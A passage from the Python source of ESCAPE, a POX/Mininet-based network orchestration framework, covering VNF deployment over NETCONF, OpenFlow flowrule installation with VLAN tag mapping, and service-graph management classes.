No longer maintained!
"""
# DomainManager name
name = "INTERNAL"
# Default domain name
DEFAULT_DOMAIN_NAME = "INTERNAL"
# Set the internal manager status
IS_INTERNAL_MANAGER = True
def __init__ (self, domain_name=DEFAULT_DOMAIN_NAME, *args, **kwargs):
"""
Init.
:param domain_name: the domain name
:type domain_name: str
:param args: optional param list
:type args: list
:param kwargs: optional keywords
:type kwargs: dict
:return: None
"""
log.debug("Create InternalDomainManager with domain name: %s" % domain_name)
super(InternalDomainManager, self).__init__(domain_name=domain_name,
*args, **kwargs)
self.controlAdapter = None # DomainAdapter for POX-InternalPOXAdapter
self.topoAdapter = None # DomainAdapter for Mininet-InternalMininetAdapter
self.remoteAdapter = None # NETCONF communication - VNFStarterAdapter
self.portmap = {} # Map (unique) dynamic ports to physical ports in EEs
self.deployed_vnfs = {} # container for replied NETCONF messages of
# deployNF, key: (infra_id, nf_id), value: initiated_vnf part of the
# parsed reply in JSON
self.sapinfos = {}
# Mapper structure for non-integer link id
self.vlan_register = {}
def init (self, configurator, **kwargs):
"""
Initialize Internal domain manager.
:param configurator: component configurator for configuring adapters
:type configurator: :any:`ComponentConfigurator`
:param kwargs: optional parameters
:type kwargs: dict
:return: None
"""
# Call abstract init to execute common operations
super(InternalDomainManager, self).init(configurator, **kwargs)
self._collect_SAP_infos()
self._setup_sap_hostnames()
self.log.info("DomainManager for %s domain has been initialized!" %
self.domain_name)
def initiate_adapters (self, configurator):
"""
Initiate adapters.
:param configurator: component configurator for configuring adapters
:type configurator: :any:`ComponentConfigurator`
:return: None
"""
# Initiate Adapters
self.topoAdapter = configurator.load_component(
component_name=AbstractESCAPEAdapter.TYPE_TOPOLOGY,
parent=self._adapters_cfg)
# Init adapter for internal controller: POX
self.controlAdapter = configurator.load_component(
component_name=AbstractESCAPEAdapter.TYPE_CONTROLLER,
parent=self._adapters_cfg)
self.log.debug("Set %s as the topology Adapter for %s" % (
self.topoAdapter.__class__.__name__,
self.controlAdapter.__class__.__name__))
# Init default NETCONF adapter
self.remoteAdapter = configurator.load_component(
component_name=AbstractESCAPEAdapter.TYPE_MANAGEMENT,
parent=self._adapters_cfg)
def finit (self):
"""
Stop polling and release dependent components.
:return: None
"""
super(InternalDomainManager, self).finit()
self.remoteAdapter.finit()
self.controlAdapter.finit()
self.topoAdapter.finit()
@property
def controller_name (self):
"""
Return with the name of the controller name.
:return: controller name
:rtype: str
"""
return self.controlAdapter.task_name
def _setup_sap_hostnames (self):
"""
Setup hostnames in /etc/hosts for SAPs.
:return: None
"""
# Update /etc/hosts with hostname - IP address mapping
import os
os.system("sed '/# BEGIN ESCAPE SAPS/,/# END ESCAPE SAPS/d' "
"/etc/hosts > /etc/hosts2")
os.system("mv /etc/hosts2 /etc/hosts")
hosts = "# BEGIN ESCAPE SAPS \n"
for sap, info in self.sapinfos.iteritems():
hosts += "%s %s \n" % (info['nw_dst'], sap)
hosts += "# END ESCAPE SAPS \n"
with open('/etc/hosts', 'a') as f:
f.write(hosts)
self.log.debug("Setup SAP hostnames: %s" % "; ".join(
["%s --> %s" % (sap, info['nw_dst']) for sap, info in
self.sapinfos.iteritems()]))
def _collect_SAP_infos (self):
"""
Collect necessary information from SAPs for traffic steering.
:return: None
"""
log.debug("Collect SAP info...")
mn = self.topoAdapter.get_mn_wrapper().network
topo = self.topoAdapter.get_topology_resource()
if topo is None or mn is None:
self.log.error("Missing topology description from topology Adapter! "
"Skip SAP data discovery.")
for sap in topo.saps:
# skip inter-domain SAPs
if sap.binding is not None:
continue
connected_node = [(v, link.dst.id) for u, v, link in
topo.real_out_edges_iter(sap.id)]
if len(connected_node) > 1:
self.log.warning("%s is connection to multiple nodes (%s)!" % (
sap, [n[0] for n in connected_node]))
for node in connected_node:
mac = mn.getNodeByName(sap.id).MAC()
ip = mn.getNodeByName(sap.id).IP()
self.log.debug("Detected IP(%s) | MAC(%s) for %s connected to Node(%s) "
"on port: %s" % (ip, mac, sap, node[0], node[1]))
if node[0] not in self.controlAdapter.saps:
self.controlAdapter.saps[node[0]] = {}
sapinfo = {'dl_src': "ff:ff:ff:ff:ff:ff",
'dl_dst': str(mac),
'nw_dst': str(ip)}
self.controlAdapter.saps[node[0]][str(node[1])] = sapinfo
self.sapinfos[str(sap.id)] = sapinfo
def install_nffg (self, nffg_part):
"""
Install an :class:`NFFG` related to the internal domain.
:param nffg_part: NF-FG need to be deployed
:type nffg_part: :class:`NFFG`
:return: installation was success or not
:rtype: bool
"""
self.log.info(">>> Install %s domain part..." % self.domain_name)
try:
# Mininet domain does not support NF migration directly -->
# Remove unnecessary and moved NFs first
result = [
self._delete_running_nfs(nffg=nffg_part),
# then (re)initiate mapped NFs
self._deploy_new_nfs(nffg=nffg_part)
]
if not all(result):
self.log.warning("Skip traffic steering due to NF initiation error(s)!")
return all(result)
self.log.info(
"Perform traffic steering according to mapped tunnels/labels...")
# OpenFlow flowrule deletion/addition is fairly cheap operations
# The most robust solution is to delete every flowrule
result.extend((self._delete_flowrules(nffg=nffg_part),
# and (re)add the new ones
self._deploy_flowrules(nffg_part=nffg_part)))
return all(result)
except:
self.log.exception("Got exception during NFFG installation into: %s." %
self.domain_name)
return False
def clear_domain (self):
"""
Infrastructure Layer has already been stopped and probably cleared.
Skip cleanup process here.
:return: cleanup result
:rtype: bool
"""
if not self.topoAdapter.check_domain_reachable():
# This would be the normal behaviour if ESCAPEv2 is shutting down -->
# Infrastructure layer has been cleared.
self.log.debug("%s domain has already been cleared!" % self.domain_name)
return True
result = (self._delete_running_nfs(), # Just for sure remove NFs
self._delete_flowrules()) # and flowrules
return all(result)
def reset_domain (self):
self.clear_domain()
def _delete_running_nfs (self, nffg=None):
"""
Stop and delete deployed NFs which do not exist in the new mapped request.
The Mininet domain does not support NF migration and assumes stateless
network functions.
Detect if an NF was moved during the previous mapping and
remove that gracefully.
If the ``nffg`` parameter is not given, skip the NF migration detection
and remove all non-existent NF by default.
:param nffg: the last mapped NFFG part
:type nffg: :class:`NFFG`
:return: deletion was successful or not
:rtype: bool
"""
result = True
topo = self.topoAdapter.get_topology_resource()
if topo is None:
self.log.warning("Missing topology description from %s domain! "
"Skip deleting NFs..." % self.domain_name)
return False
self.log.debug("Check for removable NFs...")
# Skip non-execution environments
infras = [i.id for i in topo.infras if
i.infra_type in (NFFG.TYPE_INFRA_EE, NFFG.TYPE_INFRA_STATIC_EE)]
for infra_id in infras:
# Generate list of newly mapped NF on the infra
old_running_nfs = [n.id for n in topo.running_nfs(infra_id)]
# Detect non-moved NF if new mapping was given and skip deletion
for nf_id in old_running_nfs:
# If NF exist in the new mapping
if nffg is not None and nf_id in nffg:
new_running_nfs = [n.id for n in nffg.running_nfs(infra_id)]
# And connected to the same infra
if nf_id in new_running_nfs:
# NF was not moved, Skip deletion
self.log.debug('Unchanged NF: %s' % nf_id)
continue
# If the NF exists in the new mapping, but moved to another infra
else:
self.log.info("Found moved NF: %s")
self.log.debug(
"NF migration is not supported! Stop and remove already "
"deployed NF and reinitialize later...")
else:
self.log.debug("Found removable NF: %s" % nf_id)
# Create connection Adapter to EE agent
connection_params = self.topoAdapter.get_agent_connection_params(
infra_id)
if connection_params is None:
self.log.error("Missing connection params for communication with the "
"agent of Node: %s" % infra_id)
result = False
continue
updated = self.remoteAdapter.update_connection_params(
**connection_params)
if updated:
self.log.debug("Update connection params in %s: %s" % (
self.remoteAdapter.__class__.__name__, updated))
self.log.debug("Stop deployed NF: %s" % nf_id)
try:
vnf_id = self.deployed_vnfs[(infra_id, nf_id)]['vnf_id']
reply = self.remoteAdapter.removeNF(vnf_id=vnf_id)
self.log.log(VERBOSE,
"Removed NF status:\n%s" % pprint.pformat(reply))
# Remove NF from deployed cache
del self.deployed_vnfs[(infra_id, nf_id)]
# Delete infra ports connected to the deletable NF
for u, v, link in topo.network.out_edges([nf_id], data=True):
topo[v].del_port(id=link.dst.id)
# Delete NF
topo.del_node(nf_id)
except KeyError:
self.log.error("Deployed VNF data for NF: %s is not found! "
"Skip deletion..." % nf_id)
result = False
continue
except NCClientError as e:
self.log.error("Got NETCONF RPC communication error during NF: %s "
"deletion! Skip deletion..." % nf_id)
self.log.log(VERBOSE, "Exception: %s" % e)
result = False
continue
self.log.debug("NF deletion result: %s" %
("SUCCESS" if result else "FAILURE"))
return result
def _deploy_new_nfs (self, nffg):
"""
Install the NFs mapped in the given NFFG.
If an NF is already defined in the topology and its state is up and
running, then the actual NF's initiation will be skipped!
:param nffg: container NF-FG part need to be deployed
:type nffg: :class:`NFFG`
:return: deploy was successful or not
:rtype: bool
"""
self.log.info("Deploy mapped NFs into the domain: %s..." % self.domain_name)
result = True
self.portmap.clear()
# Remove unnecessary SG and Requirement links to avoid mess up port
# definition of NFs
nffg.clear_links(NFFG.TYPE_LINK_SG)
nffg.clear_links(NFFG.TYPE_LINK_REQUIREMENT)
# Get physical topology description from Mininet
mn_topo = self.topoAdapter.get_topology_resource()
if mn_topo is None:
self.log.warning("Missing topology description from %s domain! "
"Skip deploying NFs..." % self.domain_name)
return False
# Iter through the container INFRAs in the given mapped NFFG part
# print mn_topo.dump()
for infra in nffg.infras:
if infra.infra_type not in (
NFFG.TYPE_INFRA_EE, NFFG.TYPE_INFRA_STATIC_EE):
self.log.debug(
"Infrastructure Node: %s (type: %s) is not Container type! "
"Continue to next Node..." % (infra.id, infra.infra_type))
continue
else:
self.log.debug("Check NFs mapped on Node: %s" % infra.id)
# If the actual INFRA isn't in the topology(NFFG) of this domain -> skip
if infra.id not in (n.id for n in self.internal_topo.infras):
self.log.error("Infrastructure Node: %s is not found in the %s domain! "
"Skip NF initiation on this Node..." %
(infra.id, self.domain_name))
result = False
continue
# Iter over the NFs connected the actual INFRA
for nf in nffg.running_nfs(infra.id):
# NF with id is already deployed --> change the dynamic port to
# static and continue
if nf.id in (nf.id for nf in self.internal_topo.nfs):
self.log.debug("NF: %s has already been initiated! "
"Continue to next NF..." % nf.id)
for u, v, link in nffg.real_out_edges_iter(nf.id):
dyn_port = nffg[v].ports[link.dst.id]
for x, y, l in mn_topo.real_out_edges_iter(nf.id):
if l.src.id == link.src.id:
self.portmap[dyn_port.id] = l.dst.id
dyn_port.id = l.dst.id
break
continue
# Extract the initiation params
params = {'nf_type': nf.functional_type,
'nf_ports': [link.src.id for u, v, link in
nffg.real_out_edges_iter(nf.id)],
'infra_id': infra.id}
# Check if every param is not None or empty
if not all(params.values()):
self.log.error("Missing arguments for initiation of NF: %s! "
"Extracted params: %s" % (nf.id, params))
result = False
continue
# Create connection Adapter to EE agent
connection_params = self.topoAdapter.get_agent_connection_params(
infra.id)
if connection_params is None:
self.log.error("Missing connection params for communication with the "
"agent of Node: %s" % infra.id)
result = False
continue
# Save last used adapter --> and last RPC result
self.log.info("Initiating NF: %s ..." % nf.id)
self.log.debug("NF parameters: %s" % params)
updated = self.remoteAdapter.update_connection_params(
**connection_params)
if updated:
self.log.debug("Update connection params in %s: %s" % (
self.remoteAdapter.__class__.__name__, updated))
try:
vnf = self.remoteAdapter.deployNF(**params)
except NCClientError as e:
self.log.error("Got NETCONF RPC communication error during NF: %s "
"deploy! Skip deploy..." % nf.id)
self.log.log(VERBOSE, "Exception: %s" % e)
result = False
continue
except BaseException:
self.log.error("Got unexpected error during NF: %s "
"initiation! Skip initiation..." % nf.name)
result = False
continue
self.log.log(VERBOSE, "Initiated VNF:\n%s" % pprint.pformat(vnf))
# Check if NETCONF communication was OK
if vnf and 'initiated_vnfs' in vnf and vnf['initiated_vnfs']['pid'] \
and vnf['initiated_vnfs']['status'] == \
VNFStarterAPI.VNFStatus.s_UP_AND_RUNNING:
self.log.info("NF: %s initiation has been verified on Node: %s" % (
nf.id, infra.id))
self.log.debug("Initiated VNF id: %s, PID: %s, status: %s" % (
vnf['initiated_vnfs']['vnf_id'], vnf['initiated_vnfs']['pid'],
vnf['initiated_vnfs']['status']))
else:
self.log.error("Initiated NF: %s is not verified. Initiation was "
"unsuccessful!" % nf.id)
result = False
continue
# Store NETCONF related info of deployed NF
self.deployed_vnfs[(infra.id, nf.id)] = vnf['initiated_vnfs']
# Add initiated NF to topo description
self.log.debug("Update Infrastructure layer topology description...")
deployed_nf = nf.copy()
deployed_nf.ports.clear()
mn_topo.add_nf(nf=deployed_nf)
self.log.debug("Add deployed NFs to topology...")
# Add Link between actual NF and INFRA
for nf_id, infra_id, link in nffg.real_out_edges_iter(nf.id):
# Get Link's src ref to new NF's port
nf_port = deployed_nf.ports.append(nf.ports[link.src.id].copy())
def get_sw_port (vnf):
"""
Return the switch port parsed from result of getVNFInfo
:param vnf: VNF description returned by NETCONF server
:type vnf: dict
:return: port id
:rtype: int
"""
if isinstance(vnf['initiated_vnfs']['link'], list):
for _link in vnf['initiated_vnfs']['link']:
if str(_link['vnf_port']) == str(nf_port.id):
return int(_link['sw_port'])
else:
return int(vnf['initiated_vnfs']['link']['sw_port'])
# Get OVS-generated physical port number
infra_port_num = get_sw_port(vnf)
if infra_port_num is None:
self.log.warning("Can't get Container port from RPC result! Set "
"generated port number...")
# Create INFRA side Port
infra_port = mn_topo.network.node[infra_id].add_port(
id=infra_port_num)
self.log.debug("%s - detected physical %s" %
(deployed_nf, infra_port))
# Add Links to mn topo
mn_topo.add_undirected_link(port1=nf_port, port2=infra_port,
dynamic=True, delay=link.delay,
bandwidth=link.bandwidth)
# Port mapping
dynamic_port = nffg.network.node[infra_id].ports[link.dst.id].id
self.portmap[dynamic_port] = infra_port_num
# Update port in nffg_part
nffg.network.node[infra_id].ports[
link.dst.id].id = infra_port_num
self.log.debug("%s topology description is updated with NF: %s" % (
self.domain_name, deployed_nf.name))
self.log.debug("Rewrite dynamically generated port numbers in flowrules...")
# Update port numbers in flowrules
for infra in nffg.infras:
if infra.infra_type not in (
NFFG.TYPE_INFRA_EE, NFFG.TYPE_INFRA_STATIC_EE,
NFFG.TYPE_INFRA_SDN_SW):
continue
# If the actual INFRA isn't in the topology(NFFG) of this domain -> skip
if infra.id not in (n.id for n in mn_topo.infras):
continue
for port in infra.ports:
for flowrule in port.flowrules:
_match = flowrule.match.split(';')
if not _match[0].startswith("in_port="):
self.log.warning("Missing 'in_port' from match field: %s" %
flowrule.match)
continue
_action = flowrule.action.split(';')
if not _action[0].startswith("output="):
self.log.warning("Missing 'output' from action field: %s" %
flowrule.action)
continue
for dyn, phy in self.portmap.iteritems():
_match[0] = _match[0].replace(str(dyn), str(phy))
_action[0] = _action[0].replace(str(dyn), str(phy))
flowrule.match = ";".join(_match)
flowrule.action = ";".join(_action)
if result:
self.log.info("Initiation of NFs in NFFG part: %s has been finished! "
"Result: SUCCESS" % nffg)
else:
self.log.info("Initiation of NFs in NFFG part: %s has been finished! "
"Result: FAILURE" % nffg)
return result
def _delete_flowrules (self, nffg=None):
"""
Delete all flowrules from the first (default) table of all infras.
:param nffg: last mapped NFFG part
:type nffg: :class:`NFFG`
:return: deletion was successful or not
:rtype: bool
"""
self.log.debug("Reset domain steering and delete installed flowrules...")
result = True
# Get topology NFFG to detect corresponding infras and skip needless infras
topo = self.topoAdapter.get_topology_resource()
if topo is None:
self.log.warning("Missing topology description from %s domain! "
"Skip flowrule deletions..." % self.domain_name)
return False
# If nffg is not given or is a bare topology, which is probably a cleanup
# topo, all the flowrules in physical topology will be removed
if nffg is None or nffg.is_bare():
self.log.debug("Detected empty request NFFG! "
"Remove all the installed flowrules...")
nffg = topo
topo_infras = [n.id for n in topo.infras]
# Iter through the container INFRAs in the given mapped NFFG part
self.log.debug("Managed topo infras: %s" % topo_infras)
for infra in nffg.infras:
self.log.debug("Process flowrules in infra: %s" % infra.id)
if infra.infra_type not in (NFFG.TYPE_INFRA_EE, NFFG.TYPE_INFRA_STATIC_EE,
NFFG.TYPE_INFRA_SDN_SW):
self.log.warning("Detected virtual Infrastructure Node type: %s! "
"Skip infra node processing..." % infra.infra_type)
continue
# If the actual INFRA isn't in the topology(NFFG) of this domain -> skip
if infra.id not in topo_infras:
self.log.error("Infrastructure Node: %s is not found in the %s domain! "
"Skip flowrule deletion on this Node..." %
(infra.id, self.domain_name))
result = False
continue
try:
dpid = self.controlAdapter.infra_to_dpid[infra.id]
except KeyError as e:
self.log.warning("Missing DPID for Infra(id: %s)! Skip deletion of "
"flowrules" % e)
result = False
continue
# Check the OF connection is alive
if self.controlAdapter.openflow.getConnection(dpid) is None:
self.log.warning("Skipping DELETE flowrules! Cause: connection for %s -"
" DPID: %s is not found!" % (infra, dpid_to_str(dpid)))
result = False
continue
self.controlAdapter.delete_flowrules(infra.id)
self.log.debug("Flowrule deletion result: %s" %
("SUCCESS" if result else "FAILURE"))
return result
def _deploy_flowrules (self, nffg_part):
"""
Install the flowrules given in the NFFG.
If a flowrule is already defined it will be updated.
:param nffg_part: NF-FG part need to be deployed
:type nffg_part: :class:`NFFG`
:return: deploy was successful or not
:rtype: bool
"""
self.log.debug("Deploy flowrules into the domain: %s..." % self.domain_name)
result = True
# Remove unnecessary SG and Requirement links to avoid mess up port
# definition of NFs
nffg_part.clear_links(NFFG.TYPE_LINK_SG)
nffg_part.clear_links(NFFG.TYPE_LINK_REQUIREMENT)
# # Get physical topology description from POX adapter
# topo = self.controlAdapter.get_topology_resource()
topo = self.topoAdapter.get_topology_resource()
if topo is None:
self.log.warning("Missing topology description from %s domain! "
"Skip deploying flowrules..." % self.domain_name)
return False
# Iter through the container INFRAs in the given mapped NFFG part
for infra in nffg_part.infras:
if infra.infra_type not in (
NFFG.TYPE_INFRA_EE, NFFG.TYPE_INFRA_STATIC_EE,
NFFG.TYPE_INFRA_SDN_SW):
self.log.debug("Infrastructure Node: %s (type: %s) is not Switch or "
"Container type! Continue to next Node..." %
(infra.id, infra.infra_type))
continue
# If the actual INFRA isn't in the topology(NFFG) of this domain -> skip
if infra.id not in (n.id for n in topo.infras):
self.log.error("Infrastructure Node: %s is not found in the %s domain! "
"Skip flowrule install on this Node..." % (
infra.id, self.domain_name))
result = False
continue
try:
dpid = self.controlAdapter.infra_to_dpid[infra.id]
except KeyError as e:
self.log.warning("Missing DPID for Infra(id: %s)! "
"Skip deploying flowrules for Infra" % e)
result = False
continue
# Check the OF connection is alive
if self.controlAdapter.openflow.getConnection(dpid) is None:
self.log.warning("Skipping INSTALL flowrule! "
"Cause: connection for %s - DPID: %s is not found!" %
(infra, dpid_to_str(dpid)))
result = False
continue
for port in infra.ports:
for flowrule in port.flowrules:
try:
match = NFFGConverter.field_splitter(
type=NFFGConverter.TYPE_MATCH,
field=flowrule.match)
if "in_port" not in match:
self.log.warning("Missing in_port field from match field! "
"Using container port number...")
match["in_port"] = port.id
action = NFFGConverter.field_splitter(
type=NFFGConverter.TYPE_ACTION,
field=flowrule.action)
except RuntimeError as e:
self.log.warning("Wrong format in match/action field: %s" % e)
result = False
continue
# Process the abstract TAG in match
if 'vlan_id' in match:
self.log.debug("Process TAG: %s in match field" % match['vlan_id'])
vlan = self.__process_tag(abstract_id=match['vlan_id'])
if vlan is not None:
match['vlan_id'] = vlan
else:
self.log.error("Abort Flowrule deployment...")
return
# Process the abstract TAG in action
if 'vlan_push' in action:
self.log.debug("Process TAG: %s in action field" %
action['vlan_push'])
vlan = self.__process_tag(abstract_id=action['vlan_push'])
if vlan is not None:
action['vlan_push'] = vlan
else:
self.log.error("Abort Flowrule deployment...")
return
self.log.debug("Assemble OpenFlow flowrule from: %s" % flowrule)
self.controlAdapter.install_flowrule(infra.id, match, action)
self.log.info("Flowrule deploy result: %s" %
("SUCCESS" if result else "FAILURE"))
self.log.log(VERBOSE,
"Registered VLAN IDs: %s" % pprint.pformat(self.vlan_register))
return result
def __process_tag (self, abstract_id):
"""
Generate a valid VLAN id from the raw_id data, which is derived directly
from an SG hop link id.
:param abstract_id: raw link id
:type abstract_id: str or int
:return: valid VLAN id
:rtype: int
"""
# Check if the abstract tag has already been processed
if abstract_id in self.vlan_register:
self.log.debug("Found already register TAG ID: %s ==> %s" % (
abstract_id, self.vlan_register[abstract_id]))
return self.vlan_register[abstract_id]
# Check if the raw_id is a valid number
try:
vlan_id = int(abstract_id)
# Check if the raw_id is free
if 0 < vlan_id < 4095 and vlan_id not in self.vlan_register.itervalues():
self.vlan_register[abstract_id] = vlan_id
self.log.debug("Abstract ID is a valid not-taken VLAN ID! "
"Register %s ==> %s" % (abstract_id, vlan_id))
return vlan_id
except ValueError:
# Can't be converted to int, continue with raw_id processing
pass
trailer_num = re.search(r'\d+$', abstract_id)
# If the raw_id ends with number
if trailer_num is not None:
# Check if the trailing number is a valid VLAN id (0 and 4095 are
# reserved)
trailer_num = int(trailer_num.group()) # Get matched data from Match obj
# Check if the VLAN candidate is free
if 0 < trailer_num < 4095 and \
trailer_num not in self.vlan_register.itervalues():
self.vlan_register[abstract_id] = trailer_num
self.log.debug("Trailing number is a valid non-taken VLAN ID! "
"Register %s ==> %s..." % (abstract_id, trailer_num))
return trailer_num
# else Try to find a free VLAN
else:
self.log.debug("Detected trailing number: %s is not a valid VLAN "
"or already taken!" % trailer_num)
# No valid VLAN number has found from abstract_id, try to find a free VLAN
for vlan in xrange(1, 4094):
if vlan not in self.vlan_register.itervalues():
self.vlan_register[abstract_id] = vlan
self.log.debug("Generated and registered VLAN id %s ==> %s" %
(abstract_id, vlan))
return vlan
# For loop is exhausted
else:
log.error("No available VLAN id found!")
return None
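# Illustrative examples (not in the original source) of the mapping above:
#   __process_tag("42")        --> 42 (the id itself is a free VLAN)
#   __process_tag("sg-hop-13") --> 13 (trailing number is used if free)
#   __process_tag("fwd-chain") --> first free VLAN id starting from 1
# Every result is cached in self.vlan_register, so repeated calls with the
# same abstract id always return the same VLAN.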
```
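For reference, this is roughly how the NETCONF-based adapter above is meant to be exercised. The connection parameters and the VNF type below are assumptions (they depend on the concrete Mininet EE and its agent), so read it as a hedged sketch of the `deployNF()`/`removeNF()` helpers rather than a verified recipe.
```python
# Hypothetical sketch: drive VNFStarterAdapter directly against a NETCONF
# agent started by a Mininet-based EE. Server, credentials and the VNF type
# are placeholders.
from escape.infr.topo_manager import VNFStarterAdapter

adapter = VNFStarterAdapter(server="127.0.0.1", port=830,
                            username="mininet", password="mininet", timeout=30)
# deployNF() chains initiateVNF -> connectVNF (one call per port) -> startVNF
# and returns the getVNFInfo() reply of the freshly started VNF.
reply = adapter.deployNF(nf_type="headerDecompressor", nf_ports=(1,),
                         infra_id="EE1")
vnf_id = reply['initiated_vnfs']['vnf_id']
print("Deployed VNF %s with status %s" % (vnf_id,
                                          reply['initiated_vnfs']['status']))
# Later: stop and remove the VNF gracefully through the same adapter.
adapter.removeNF(vnf_id=vnf_id)
```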
#### File: escape/service/element_mgmt.py
```python
class AbstractElementManager(object):
"""
Abstract class for element management components (EM).
.. warning::
Not implemented yet!
"""
def __init__ (self):
"""
Init.
:return: None
"""
pass
class ClickManager(AbstractElementManager):
"""
Manager class for specific VNF management based on Clicky.
.. warning::
Not implemented yet!
"""
def __init__ (self):
"""
Init.
:return: None
"""
super(ClickManager, self).__init__()
```
#### File: escape/service/sas_orchestration.py
```python
from escape.service import log as log, LAYER_NAME
from escape.service.sas_mapping import ServiceGraphMapper
from escape.util.mapping import AbstractOrchestrator, ProcessorError
from escape.util.misc import VERBOSE
from pox.lib.revent.revent import EventMixin, Event
class MissingVirtualViewEvent(Event):
"""
Event for signaling missing virtual resource view
"""
pass
class ServiceOrchestrator(AbstractOrchestrator):
"""
Main class for the actual Service Graph processing.
"""
# Default Mapper class as a fallback mapper
DEFAULT_MAPPER = ServiceGraphMapper
"""Default Mapper class as a fallback mapper"""
def __init__ (self, layer_API):
"""
Initialize main Service Layer components.
:param layer_API: layer API instance
:type layer_API: :any:`ServiceLayerAPI`
:return: None
"""
super(ServiceOrchestrator, self).__init__(layer_API=layer_API)
log.debug("Init %s" % self.__class__.__name__)
# Init SG Manager
self.sgManager = SGManager()
# Init virtual resource manager
# Listeners must be weak references so that the layer API can be garbage
# collected
self.virtResManager = VirtualResourceManager()
self.virtResManager.addListeners(layer_API, weak=True)
def initiate_service_graph (self, sg, continued_request_id=False):
"""
Main function for initiating Service Graphs.
:param sg: service graph stored in NFFG instance
:type sg: :class:`NFFG`
:param continued_request_id: use explicit request id if request is
continued after a trial and error (default: False)
:type continued_request_id: str or None
:return: NF-FG description
:rtype: :class:`NFFG`
"""
log.debug("Invoke %s to initiate SG(id=%s)" %
(self.__class__.__name__, sg.id))
if not continued_request_id:
# Store newly created SG
self.sgManager.save(sg)
else:
# Use the original NFFG requested for getting the original request
nffg = self.sgManager.get(graph_id=continued_request_id)
log.info("Using original request for remapping: %s" % nffg)
# Get virtual resource info as a Virtualizer
virtual_view = self.virtResManager.virtual_view
# Notify remote visualizer about resource view of this layer if it's needed
# notify_remote_visualizer(data=virtual_view.get_resource_info(),
# id=LAYER_NAME)
# Log verbose service request
log.log(VERBOSE, "Service layer request graph:\n%s" % sg.dump())
if virtual_view is not None:
# If the request is a bare NFFG, it is probably an empty topo for domain
# deletion --> skip mapping to avoid BadInputException and forward
# topo to adaptation layer
if not continued_request_id:
if sg.is_bare():
log.warning("No valid service request (VNFs/Flowrules/SGhops) has "
"been detected in SG request! Skip orchestration in "
"layer: %s and proceed with the bare %s..." %
(LAYER_NAME, sg))
if sg.is_virtualized():
if sg.is_SBB():
log.debug("Request is a bare SingleBiSBiS representation!")
else:
log.warning("Detected virtualized representation with multiple "
"BiSBiS nodes! Currently this type of virtualization "
"is nut fully supported!")
else:
log.debug("Detected full view representation!")
# Return with the original request
return sg
else:
log.info("Request check: detected valid NFFG content!")
try:
# Run orchestration before service mapping algorithm
mapped_nffg = self.mapper.orchestrate(input_graph=sg,
resource_view=virtual_view,
continued=bool(
continued_request_id))
log.debug("SG initiation is finished by %s" % self.__class__.__name__)
return mapped_nffg
except ProcessorError as e:
log.warning("Mapping pre/post processing was unsuccessful! "
"Cause: %s" % e)
# Propagate the ProcessError to API layer
raise
else:
log.warning("Virtual view is not acquired correctly!")
# Only gets here if there is a problem
log.error("Abort orchestration process!")
class SGManager(object):
"""
Store, handle and organize Service Graphs.
Currently it just stores SGs in one central place.
"""
def __init__ (self):
"""
Init.
:return: None
"""
super(SGManager, self).__init__()
log.debug("Init %s" % self.__class__.__name__)
self._service_graphs = dict()
self._last = None
def save (self, sg):
"""
Save SG in a dict.
:param sg: Service Graph
:type sg: :class:`NFFG`
:return: computed id of given Service Graph
:rtype: int
"""
sg = sg.copy()
self._service_graphs[sg.id] = sg
self._last = sg
log.debug("SG: %s is saved by %s with id: %s" % (
sg, self.__class__.__name__, sg.id))
return sg.id
def get (self, graph_id):
"""
Return service graph with given id.
:param graph_id: graph ID
:type graph_id: int
:return: stored Service Graph
:rtype: :class:`NFFG`
"""
return self._service_graphs.get(graph_id, None)
def get_last_request (self):
"""
Return with the last saved :class:`NFFG`.
:return: last saved NFFG
:rtype: :class:`NFFG`
"""
return self._last
class VirtualResourceManager(EventMixin):
"""
Support Service Graph mapping, follow the used virtual resources according to
the Service Graph(s) in effect.
Handles objects derived from :class:`AbstractVirtualizer` and requested from
lower layer.
"""
# Events raised by this class
_eventMixin_events = {MissingVirtualViewEvent}
"""Events raised by this class"""
def __init__ (self):
"""
Initialize virtual resource manager.
:return: None
"""
super(VirtualResourceManager, self).__init__()
# Derived object from AbstractVirtualizer which represent the virtual
# view of this layer
self._virtual_view = None
log.debug("Init %s" % self.__class__.__name__)
@property
def virtual_view (self):
"""
Return resource info of actual layer as an :class:`NFFG
<escape.util.nffg.NFFG>` instance.
If it does not exist, request it from the Orchestration layer.
:return: resource info as a Virtualizer
:rtype: :any:`AbstractVirtualizer`
"""
log.debug("Invoke %s to get the <Virtual View>" % self.__class__.__name__)
if not self._virtual_view:
log.debug("Missing <Virtual View>! Requesting <Virtual View> now...")
self.raiseEventNoErrors(MissingVirtualViewEvent)
if self._virtual_view is not None:
log.debug("Got requested <Virtual View>: %s" % self._virtual_view)
return self._virtual_view
@virtual_view.setter
def virtual_view (self, view):
"""
Virtual view setter.
:param view: virtual view
:type view: :any:`AbstractVirtualizer`
:return: None
"""
self._virtual_view = view
@virtual_view.deleter
def virtual_view (self):
"""
Virtual view deleter.
:return: None
"""
del self._virtual_view
```
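For orientation, a hedged usage sketch of the `SGManager` bookkeeping above (the import path and the dummy request object are assumptions for illustration; `SGManager` only relies on the request exposing `id` and `copy()`):
```python
from escape.service.sas_orchestration import SGManager  # assumed import path

# Hypothetical stand-in for an NFFG request; only id and copy() are needed here.
class DummySG(object):
    def __init__(self, id):
        self.id = id

    def copy(self):
        return DummySG(self.id)

manager = SGManager()
sg_id = manager.save(DummySG(id="sg-1"))  # a copy of the request is stored
original = manager.get(graph_id=sg_id)    # fetched later, e.g. for re-mapping
last = manager.get_last_request()         # most recently saved request
```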
#### File: escape/util/config.py
```python
import collections
import importlib
import os
import pprint
import urlparse
from distutils.util import strtobool
import yaml
from escape.adapt import LAYER_NAME as ADAPT
from escape.infr import LAYER_NAME as INFR
from escape.orchest import LAYER_NAME as ORCHEST
from escape.service import LAYER_NAME as SERVICE
from escape.util.misc import VERBOSE, quit_with_error
from escape.util.pox_extension import POXCoreRegisterMetaClass
from pox.core import log
# Store the project root where escape.py is started in
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__) + "/../../../")
class ConfigurationError(RuntimeError):
"""
Error class for signaling errors related to configuration load, parse etc.
"""
pass
class ESCAPEConfig(object):
"""
Wrapper class for configuration to hide specialties with respect to storing,
loading, parsing and getting special data.
Contains functions for config handling and manipulation.
Should be instantiated once!
"""
# Singleton
__metaclass__ = POXCoreRegisterMetaClass
"""Singleton"""
_core_name = "CONFIG"
# Predefined layer names
LAYERS = (SERVICE, ORCHEST, ADAPT, INFR)
"""Predefined layer names"""
# Default additional config name
